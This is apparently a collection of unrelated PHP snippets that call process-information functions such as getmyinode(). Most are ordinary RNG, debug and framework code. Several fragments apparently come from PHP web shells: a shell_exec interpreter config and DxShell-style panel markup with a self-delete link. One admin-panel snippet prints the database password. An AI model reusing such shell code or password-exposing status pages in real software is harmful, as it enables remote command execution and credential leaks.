function randomBytes($length = 16, $secure = true, $raw = true, $startEntropy = "", &$rounds = 0, &$drop = 0) { static $lastRandom = ""; $output = ""; $length = abs((int) $length); $secureValue = ""; $rounds = 0; $drop = 0; while (!isset($output[$length - 1])) { //some entropy, but works ^^ $weakEntropy = array(is_array($startEntropy) ? implode($startEntropy) : $startEntropy, serialize(stat(__FILE__)), __DIR__, PHP_OS, microtime(), (string) lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) PHP_INT_MAX . "." . PHP_INT_SIZE, serialize($_SERVER), serialize(get_defined_constants()), get_current_user(), serialize(ini_get_all()), (string) memory_get_usage() . "." . memory_get_peak_usage(), php_uname(), phpversion(), extension_loaded("gmp") ? gmp_strval(gmp_random(4)) : microtime(), zend_version(), (string) getmypid(), (string) getmyuid(), (string) mt_rand(), (string) getmyinode(), (string) getmygid(), (string) rand(), function_exists("zend_thread_id") ? (string) zend_thread_id() : microtime(), var_export(@get_browser(), true), function_exists("getrusage") ? @implode(getrusage()) : microtime(), function_exists("sys_getloadavg") ? @implode(sys_getloadavg()) : microtime(), serialize(get_loaded_extensions()), sys_get_temp_dir(), (string) disk_free_space("."), (string) disk_total_space("."), uniqid(microtime(), true), file_exists("/proc/cpuinfo") ? file_get_contents("/proc/cpuinfo") : microtime()); shuffle($weakEntropy); $value = hash("sha512", implode($weakEntropy), true); $lastRandom .= $value; foreach ($weakEntropy as $k => $c) { //mixing entropy values with XOR and hash randomness extractor $value ^= hash("sha256", $c . microtime() . $k, true) . hash("sha256", mt_rand() . microtime() . $k . $c, true); $value ^= hash("sha512", (string) lcg_value() . $c . microtime() . $k, true); } unset($weakEntropy); if ($secure === true) { $strongEntropyValues = array(is_array($startEntropy) ? hash("sha512", $startEntropy[($rounds + $drop) % count($startEntropy)], true) : hash("sha512", $startEntropy, true), file_exists("/dev/urandom") ? fread(fopen("/dev/urandom", "rb"), 64) : str_repeat("", 64), (function_exists("openssl_random_pseudo_bytes") and version_compare(PHP_VERSION, "5.3.4", ">=")) ? openssl_random_pseudo_bytes(64) : str_repeat("", 64), function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : str_repeat("", 64), $value); $strongEntropy = array_pop($strongEntropyValues); foreach ($strongEntropyValues as $value) { $strongEntropy = $strongEntropy ^ $value; } $value = ""; //Von Neumann randomness extractor, increases entropy $bitcnt = 0; for ($j = 0; $j < 64; ++$j) { $a = ord($strongEntropy[$j]); for ($i = 0; $i < 8; $i += 2) { $b = ($a & 1 << $i) > 0 ? 1 : 0; if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) { $secureValue |= $b << $bitcnt; if ($bitcnt == 7) { $value .= chr($secureValue); $secureValue = 0; $bitcnt = 0; } else { ++$bitcnt; } ++$drop; } else { $drop += 2; } } } } $output .= substr($value, 0, min($length - strlen($output), $length)); unset($value); ++$rounds; } $lastRandom = hash("sha512", $lastRandom, true); return $raw === false ? bin2hex($output) : $output; }
public function __construct() { $this->config = array('filename' => basename(__FILE__), 'username' => '', 'password' => '', 'interpreter' => 'shell_exec', 'current_user' => get_current_user(), 'hostname' => function_exists('gethostname') ? gethostname() : $_SERVER['HTTP_HOST'], 'server_address' => isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : '127.0.0.1', 'server_port' => $_SERVER['SERVER_PORT'], 'request_time' => $_SERVER['REQUEST_TIME'], 'php_owner_uid' => getmyuid(), 'php_owner_gid' => getmygid(), 'php_process_id' => getmypid(), 'inode_script' => getmyinode(), 'last_page_modification' => getlastmod(), 'cwd' => getcwd()); if (isset($_SESSION['interpreter'])) { $this->config['interpreter'] = $_SESSION['interpreter']; } if (isset($_SESSION['cwd']) && $_SESSION['cwd'] != $this->config['cwd']) { chdir($_SESSION['cwd']); $this->config['cwd'] = getcwd(); } $this->config['prompt'] = $this->get_prompt(); }
/** * Render information about the current request, if possible * * @return string */ protected function renderRequestInfo() { $output = ''; if (Bootstrap::$staticObjectManager instanceof ObjectManagerInterface) { $bootstrap = Bootstrap::$staticObjectManager->get(\TYPO3\Flow\Core\Bootstrap::class); /* @var Bootstrap $bootstrap */ $requestHandler = $bootstrap->getActiveRequestHandler(); if ($requestHandler instanceof HttpRequestHandlerInterface) { $request = $requestHandler->getHttpRequest(); $response = $requestHandler->getHttpResponse(); $output .= PHP_EOL . 'HTTP REQUEST:' . PHP_EOL . ($request == '' ? '[request was empty]' : $request) . PHP_EOL; $output .= PHP_EOL . 'HTTP RESPONSE:' . PHP_EOL . ($response == '' ? '[response was empty]' : $response) . PHP_EOL; $output .= PHP_EOL . 'PHP PROCESS:' . PHP_EOL . 'Inode: ' . getmyinode() . PHP_EOL . 'PID: ' . getmypid() . PHP_EOL . 'UID: ' . getmyuid() . PHP_EOL . 'GID: ' . getmygid() . PHP_EOL . 'User: ' . get_current_user() . PHP_EOL; } } return $output; }
print "\n" . DxPrint_ParamState('MsSQL', function_exists('mssql_connect')) . ' ; '; print "\n" . DxPrint_ParamState('PostgreSQL', function_exists('pg_connect')) . ' ; '; print "\n" . DxPrint_ParamState('Oracle', function_exists('ocilogon')) . ' ; '; print "\n" . 'Disabled functions: ' . (($df = @ini_get('disable_functions')) == '' ? '<font color=#00FF00><b>NONE</b></font>' : '<font color=#FF0000><b>' . str_replace(array(',', ';'), ', ', $df) . '</b></font>'); print "\n" . '</div>'; print "\n\n" . '<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>'; if (strlen($GLOB['SHELL']['USER']['Login']) + strlen($GLOB['SHELL']['USER']['Passw']) >= 2) { print "\n" . '<a href="' . DxURL('kill', 'dxinstant') . '&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>'; } print "\n" . '<a href="' . DxURL('kill', 'dxinstant') . '&dxinstant=DEL" title="Delete self (' . basename($_SERVER['PHP_SELF']) . ')" class=no><font color=#FF0000;>' . DxImg('del') . '</font></a>'; print "\n" . '</nobr></td></tr></table></span>'; print "\n\n" . '<hr>'; print "\n" . 'Disk free: <b>' . DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])) . ' / ' . DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])) . '</b> ; '; print "\n" . 'OS: <b>' . $GLOB['SYS']['OS']['id'] . ' (' . $GLOB['SYS']['OS']['Full'] . ' )</b> ; '; print "\n" . 'Yer_IP: <b>' . @$_SERVER['REMOTE_ADDR'] . ' (' . @$_SERVER['REMOTE_HOST'] . ')</b> ; '; print "\n" . '<nobr>Own/U/G/Pid/Inode:<wbr><b>' . get_current_user() . ' / ' . getmyuid() . ' / ' . getmygid() . ' / ' . getmypid() . ' / ' . getmyinode() . '</b> ; </nobr>'; print "\n" . 'MySQL : <b>' . @mysql_get_server_info() . '</b> ; '; print "\n" . '<br>' . @$_SERVER['SERVER_SOFTWARE']; ?> </td> </table> <table width=100% cellspacing=0 cellpadding=0 class=outset> <tr> <td width=100pt class=h2_oneline><h2>Modes</td> <td style="text-align:center;"><nobr> <a href="<?php echo DxURL('kill', ''); ?> &dxmode=DIR">DIR</a> | <a href="<?php echo DxURL('kill', '');
/** * This function tries to get all the entropy available in PHP, and distills it to get a good RNG. * * * @param int $length default 16, Number of bytes to generate * @param bool $secure default true, Generate secure distilled bytes, slower * @param bool $raw default true, returns a binary string if true, or an hexadecimal one * @param string $startEntropy default null, adds more initial entropy * @param int &$rounds Will be set to the number of rounds taken * @param int &$drop Will be set to the amount of dropped bytes * * @return string */ public static function getRandomBytes($length = 16, $secure = \true, $raw = \true, $startEntropy = "", &$rounds = 0, &$drop = 0) { static $lastRandom = ""; $output = ""; $length = \abs((int) $length); $secureValue = ""; $rounds = 0; $drop = 0; while (!isset($output[$length - 1])) { //some entropy, but works ^^ $weakEntropy = [\is_array($startEntropy) ? \implode($startEntropy) : $startEntropy, __DIR__, PHP_OS, \microtime(), (string) \lcg_value(), (string) PHP_MAXPATHLEN, PHP_SAPI, (string) \PHP_INT_MAX . "." . \PHP_INT_SIZE, \serialize($_SERVER), \get_current_user(), (string) \memory_get_usage() . "." . \memory_get_peak_usage(), \php_uname(), \phpversion(), \zend_version(), (string) \getmypid(), (string) \getmyuid(), (string) \mt_rand(), (string) \getmyinode(), (string) \getmygid(), (string) \rand(), \function_exists("zend_thread_id") ? (string) zend_thread_id() : \microtime(), \function_exists("getrusage") ? \implode(\getrusage()) : \microtime(), \function_exists("sys_getloadavg") ? \implode(\sys_getloadavg()) : \microtime(), \serialize(\get_loaded_extensions()), \sys_get_temp_dir(), (string) \disk_free_space("."), (string) \disk_total_space("."), \uniqid(\microtime(), \true), \file_exists("/proc/cpuinfo") ? \file_get_contents("/proc/cpuinfo") : \microtime()]; \shuffle($weakEntropy); $value = \hash("sha512", \implode($weakEntropy), \true); $lastRandom .= $value; foreach ($weakEntropy as $k => $c) { //mixing entropy values with XOR and hash randomness extractor $value ^= \hash("sha256", $c . \microtime() . $k, \true) . \hash("sha256", \mt_rand() . \microtime() . $k . $c, \true); $value ^= \hash("sha512", (string) \lcg_value() . $c . \microtime() . $k, \true); } unset($weakEntropy); if ($secure === \true) { if (\file_exists("/dev/urandom")) { $fp = \fopen("/dev/urandom", "rb"); $systemRandom = \fread($fp, 64); \fclose($fp); } else { $systemRandom = \str_repeat("", 64); } $strongEntropyValues = [\is_array($startEntropy) ? \hash("sha512", $startEntropy[($rounds + $drop) % \count($startEntropy)], \true) : \hash("sha512", $startEntropy, \true), $systemRandom, \function_exists("openssl_random_pseudo_bytes") ? openssl_random_pseudo_bytes(64) : \str_repeat("", 64), \function_exists("mcrypt_create_iv") ? mcrypt_create_iv(64, MCRYPT_DEV_URANDOM) : \str_repeat("", 64), $value]; $strongEntropy = \array_pop($strongEntropyValues); foreach ($strongEntropyValues as $value) { $strongEntropy = $strongEntropy ^ $value; } $value = ""; //Von Neumann randomness extractor, increases entropy $bitcnt = 0; for ($j = 0; $j < 64; ++$j) { $a = \ord($strongEntropy[$j]); for ($i = 0; $i < 8; $i += 2) { $b = ($a & 1 << $i) > 0 ? 1 : 0; if ($b != (($a & 1 << $i + 1) > 0 ? 1 : 0)) { $secureValue |= $b << $bitcnt; if ($bitcnt == 7) { $value .= \chr($secureValue); $secureValue = 0; $bitcnt = 0; } else { ++$bitcnt; } ++$drop; } else { $drop += 2; } } } } $output .= \substr($value, 0, \min($length - \strlen($output), $length)); unset($value); ++$rounds; } $lastRandom = \hash("sha512", $lastRandom, \true); return $raw === \false ? \bin2hex($output) : $output; }
<?php var_dump(getlastmod()); var_dump(getmyinode()); var_dump(getmyuid()); var_dump(getmypid()); var_dump(getmygid()); echo "Done\n";
/** * Print out content of session's variable * * @return htmlOutput if not PRINT_DEBUG_INFO * @author Christophe Gesché <*****@*****.**> * */ function echo_session_value() { $infoResult = ""; global $statuts, $statut, $status, $is_admin; if (!isset($is_admin) || !$is_admin) { exit('not aivailable'); } $infoResult .= ' <hr /> <a href="../claroline/admin/phpInfo.php">phpInfo Claroline</a> <PRE><strong>PHP Version</strong> : ' . phpversion() . ' <strong>nivo d\'err</strong> : ' . error_reporting(2039); if (isset($statuts)) { $infoResult .= ' <strong>statut</strong> : '; print_r($statuts); } if (isset($statut)) { $infoResult .= ' <strong>statut</strong> : '; print_r($statut); } if (isset($status)) { $infoResult .= "\n <strong>status</strong> : "; print_r($status); } if ('' != trim(get_conf('dbHost')) || '' != trim(get_conf('dbLogin'))) { $infoResult .= ' <strong>mysql param</strong> : Serveur : ' . get_conf('dbHost') . ' User : '******'dbLogin'); } if (isset($_SESSION)) { $infoResult .= "\n <strong>session</strong> : "; print_r($_SESSION); } if (isset($_POST)) { $infoResult .= "\n <strong>Post</strong> : "; print_r($_POST); } if (isset($_GET)) { $infoResult .= "\n <strong>GET</strong> : "; print_r($_GET); } $infoResult .= "\n <strong>Contantes</strong> : "; print_r(get_defined_constants()); get_current_user(); $infoResult .= "\n <strong>Fichiers inclus</strong> : "; print_r(get_included_files()); $infoResult .= "\n <strong>Magic quote gpc</strong> : " . get_magic_quotes_gpc() . "\n <strong>Magig quote runtime</strong> : " . get_magic_quotes_runtime() . "\n <strong>date de dernière modification de la page</strong> : " . date("j-m-Y", getlastmod()); /* get_cfg_var -- Retourne la valeur d'une option de PHP getenv -- Retourne la valeur de la variable d'environnement. ini_alter -- Change la valeur d'une option de configuration ini_get -- Lit la valeur d'une option de configuration. ini_get_all -- Lit toutes les valeurs de configuration ini_restore -- Restaure la valeur de l'option de configuration ini_set -- Change la valeur d'une option de configuration putenv -- Fixe la valeur d'une variable d'environnement. set_magic_quotes_runtime -- Active/désactive l'option magic_quotes_runtime. set_time_limit -- Fixe le temps maximum d'exécution d'un script. */ $infoResult .= "\n <strong>Type d'interface utilisé entre le serveur web et PHP</strong> : " . php_sapi_name() . "\n <strong>informations OS</strong> : " . php_uname() . "\n <strong>Version courante du moteur Zend</strong> : " . zend_version() . "\n <strong>GID du propriétaire du script</strong> : " . getmygid() . "\n <strong>inode du script</strong> : " . getmyinode() . "\n <strong>numéro de processus courant</strong> : " . getmypid() . "\n <strong>UID du propriétaire du script actuel</strong> : " . getmyuid() . "\n <strong>niveau d'utilisation des ressources</strong> : "; print_r(@getrusage()); $infoResult .= "\n </PRE>\n <hr />\n "; if (PRINT_DEBUG_INFO) { echo $infoResult; } return $infoResult; }
private static function _renderSystem() { $i = true; $php = array(); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP версия:", "value" => phpversion()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP идентификатор процесса:", "value" => zend_version()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "PHP ZEND версия:", "value" => getmypid()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта:", "value" => get_current_user()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [UID]:", "value" => getmyuid()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [GID]:", "value" => getmygid()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Владелец скрипта [inode]:", "value" => getmyinode()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. время выполнения скрипта:", "value" => ini_get("max_execution_time")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. размер загружаемого файла:", "value" => ini_get("upload_max_filesize")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. размер POST-данных:", "value" => ini_get("post_max_size")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Макс. объем памяти скрипта:", "value" => ini_get("memory_limit")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Папка загружаемых файлов:", "value" => ini_get("upload_tmp_dir")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Папка хранения сессий:", "value" => ini_get("session.save_path")); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Путь включения скриптов:", "value" => get_include_path()); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Cборщик циклических ссылок:", "value" => @function_exists("gc_enabled") ? gc_enabled() ? "On" : "Off" : "N/A(?)"); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "MAGIC_QUOTES_GPC:", "value" => self::mquotes_gpc() ? "On" : "Off"); $php[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "MAGIC_QUOTES_RUNTIME:", "value" => self::mquotes_runtime() ? "On" : "Off"); $i = true; $mysql = array(); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Версия сервера:", "value" => mysql_get_server_info()); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя сервера:", "value" => db::coninfo("host")); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя БД:", "value" => db::coninfo("name")); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Имя пользователя:", "value" => db::coninfo("user")); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Пароль:", "value" => db::coninfo("pass")); $mysql[] = array("row" => 1 + (0 + ($i = !$i)), "name" => "Используемое расширение:", "value" => mysql); $t = tpl::get(self::$class, self::$section["name"]); $t->setArrayCycle("php", $php); $t->setArrayCycle("mysql", $mysql); $t->_render(); }
<h3><code>int</code> filectime(<code>string $filename</code>) <span class="badge">4+</span></h3> <div><?php var_dump(date('F d Y H:i:s', filectime(__FILE__))); ?> </div> <h3><code>int</code> filegroup(<code>string $filename</code>) <span class="badge">4+</span></h3> <h3><code>int</code> fileinode(<code>string $filename</code>) <span class="badge">4+</span></h3> <div><?php var_dump(getmyinode(), fileinode(__FILE__)); ?> </div> <h3><code>int</code> filemtime(<code>string $filename</code>) <span class="badge">4+</span></h3> <div><?php var_dump(date('F d Y H:i:s', filemtime(__FILE__))); ?> </div> <h3><code>int</code> fileowner(<code>string $filename</code>) <span class="badge">4+</span></h3>
/** * @return int */ public function getProcessInode() { return getmyinode(); }
public static function hash() { return sha1(getmypid() . microtime() . getmyinode()); }
//echo "Process title: " . cli_get_process_title() . "\n"; echo get_include_path(); echo "<br/>"; //获取所有加载的模块 echo "<pre>"; print_r(get_loaded_extensions()); echo "<br/>"; echo "<pre>"; print_r($_SERVER); echo "<br/>"; // 输出类似 'Last modified: March 04 1998 20:43:59.' echo "Last modified: " . date("F d Y H:i:s.", getlastmod()); echo "<br/>"; echo getmygid(); echo "<br/>"; echo getmyinode(); echo "<br/>"; echo getmypid(); echo "<br/>"; echo getmyuid(); //echo "<br/>"; //echo "<pre>"; //print_r(getopt()); echo "<br/>"; echo "<pre>"; //print_r(getrusage()); echo "<br/>"; echo "<pre>"; //获取所有的配置选项 print_r(ini_get_all()); echo "<br/>";